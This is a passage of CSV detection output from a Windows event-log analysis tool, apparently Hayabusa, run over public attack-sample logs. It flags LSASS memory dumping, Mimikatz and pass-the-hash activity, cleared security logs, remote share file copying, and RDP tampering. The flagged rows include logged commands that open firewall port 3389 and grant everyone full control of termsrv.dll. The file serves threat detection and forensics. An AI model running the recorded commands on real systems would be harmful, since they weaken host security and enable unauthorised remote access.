+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe 
: IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry 
Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : 
Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions 
Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 